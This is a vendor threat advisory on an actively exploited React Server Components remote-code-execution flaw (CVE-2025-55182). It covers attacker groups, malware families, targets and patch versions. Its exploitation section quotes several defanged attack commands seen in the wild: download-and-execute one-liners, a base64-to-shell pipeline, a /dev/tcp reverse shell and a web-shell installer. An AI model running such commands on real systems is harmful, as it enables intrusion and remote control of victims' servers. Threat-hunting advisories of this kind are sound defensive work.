Executive Summary

A critical remote code execution (RCE) vulnerability, CVE-2025-55182, has been identified in React Native and related frameworks implementing React Server Components (RSC). This vulnerability, dubbed "React2Shell," is being actively exploited in the wild. The flaw arises from insecure deserialization within the RSC Flight protocol, enabling unauthenticated attackers to execute arbitrary code on affected servers. Attackers are leveraging this vulnerability to deploy a variety of malware, including cryptominers, remote access trojans (RATs), and web shells, as well as to facilitate initial access, lateral movement, and data exfiltration. The exploitation is widespread, targeting cloud environments, higher education, government, and enterprise sectors globally. Immediate patching and threat hunting are strongly advised.

Threat Actor Profile

Multiple threat actors, including advanced persistent threat (APT) groups and financially motivated cybercriminals, are exploiting CVE-2025-55182. Notably, the Chinese state-sponsored group CL-STA-1015 (UNC5174) and North Korean group UNC5342 have been observed leveraging this vulnerability for initial access and post-exploitation activities. These actors are known for rapid exploitation of N-day vulnerabilities and for deploying sophisticated malware such as EtherRAT and Noodle RAT. Additionally, opportunistic cybercriminals are using automated scanning and exploitation tools to compromise exposed servers, often deploying cryptominers and botnet loaders. The diversity of actors underscores the criticality and broad appeal of this vulnerability.

Technical Analysis of Malware/TTPs

The root cause of CVE-2025-55182 is insecure deserialization in the react-server package, specifically within the RSC Flight protocol. Attackers craft malicious HTTP POST requests containing payloads that, when deserialized by the vulnerable server, result in arbitrary code execution. This attack vector does not require authentication and is effective against default configurations, making exploitation trivial and highly reliable.

Upon successful exploitation, attackers typically execute base64-encoded shell commands to evade detection and perform system reconnaissance. Common post-exploitation activities include downloading and executing additional payloads using curl or wget, establishing persistence via Linux backdoors such as KSwapDoor (masquerading as kswapd1) and Auto-color (disguised as a PAM library), and deploying web shells like fm.js (a Node.js-based file manager). For lateral movement, attackers enumerate internal networks and cloud credentials, often using automated scripts.

Malware families observed in these campaigns include Cobalt Strike (for post-exploitation and lateral movement), XMRig (for cryptomining), EtherRAT (leveraging Ethereum smart contracts for command and control), and Noodle RAT (a backdoor favored by Chinese-speaking actors). Attackers also deploy Mirai botnet loaders in containerized environments such as Kubernetes and Docker.

MITRE ATT&CK techniques mapped to these campaigns include T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter), T1105 (Ingress Tool Transfer), T1071 (Application Layer Protocol), T1566 (Phishing, in related EtherRAT campaigns), and T1219 (Remote Access Tools).

Exploitation in the Wild

Active exploitation of CVE-2025-55182 has been confirmed by multiple security vendors, including Palo Alto Networks Unit42, Wiz, and Amazon Threat Intelligence. Attackers are conducting mass scanning for vulnerable endpoints, followed by automated exploitation. Evidence of compromise includes the deployment of cryptominers, RATs, and web shells, as well as the use of reverse shells to establish persistent access.

Notable malicious commands observed in the wild (defanged for safety) include:

• /bin/sh -c wget hxxp://46.36.37[.]85:12000/sex.sh && bash sex.sh

• /bin/sh -c (curl -sL hxxp://45.32.158[.]54/5e51aff54626ef7f/x86_64 -o /tmp/x86_64;chmod 777 /tmp/x86_64;/tmp/x86_64)

• /bin/sh -c echo <base64-encoded text> | base64 -d | sh | base64 -w0

• bash -c bash -i >& /dev/tcp/38.162.112[.]141/8899 0>&1

  (Cobalt Strike reverse shell)

• /bin/sh -c cd /tmp && wget -q -O fm.js hxxps://raw.githubusercontent.com/laolierzi-commits/phpbd/refs/heads/main/rjs/filemanager-standalone.js && nohup node fm.js > /dev/null 2>&1 &

Attackers are also targeting cloud and container environments, attempting to deploy Mirai botnet loaders and cryptominers in Kubernetes and Docker instances. Credential theft and lateral movement are facilitated through automated scripts and reconnaissance commands.

Victimology and Targeting

The exploitation of CVE-2025-55182 is global in scope, with confirmed targeting of higher education, government, chemical industry, cloud service providers, and general enterprise environments. Geographically, attacks have been observed in Asia (notably China and North Korea), North America (including the United States), and across global cloud infrastructure. The opportunistic nature of the exploitation, combined with the involvement of sophisticated APT groups, indicates that any organization running vulnerable versions of React Native, Next.js, or related frameworks is at risk, regardless of sector or geography.

Mitigation and Countermeasures

Immediate action is required to mitigate the risk posed by CVE-2025-55182. Organizations should:

Patch all affected systems without delay. For React, upgrade to 19.0.1, 19.1.2, or 19.2.1. For Next.js, upgrade to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5. Ensure that any framework or plugin bundling vulnerable react-server packages is updated to a secure version.

Conduct threat hunting using the provided indicators of compromise (IOCs), including suspicious IP addresses, URLs, and malware hashes. Review logs for evidence of suspicious child processes spawned by node or bun processes, especially those invoking curl, wget, bash, or similar tools.

Isolate and remediate any compromised systems. Remove unauthorized web shells, backdoors, and malware. Rotate credentials and review access logs for signs of lateral movement or data exfiltration.

Implement network segmentation and least privilege access controls to limit the blast radius of potential compromises. Monitor for anomalous outbound connections, particularly to known malicious IP addresses and domains.

Educate development and operations teams about the risks associated with insecure deserialization and the importance of timely patching.

References

• Palo Alto Networks Unit42: CVE-2025-55182

• React Security Advisory

• Wiz Blog: React2Shell

• NVD: CVE-2025-55182

• Reddit: r/pwnhub

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to help organizations stay ahead of emerging threats and ensure compliance with industry standards. For more information about how Rescana can help secure your organization, or for any questions regarding this advisory, please contact us at ops@rescana.com.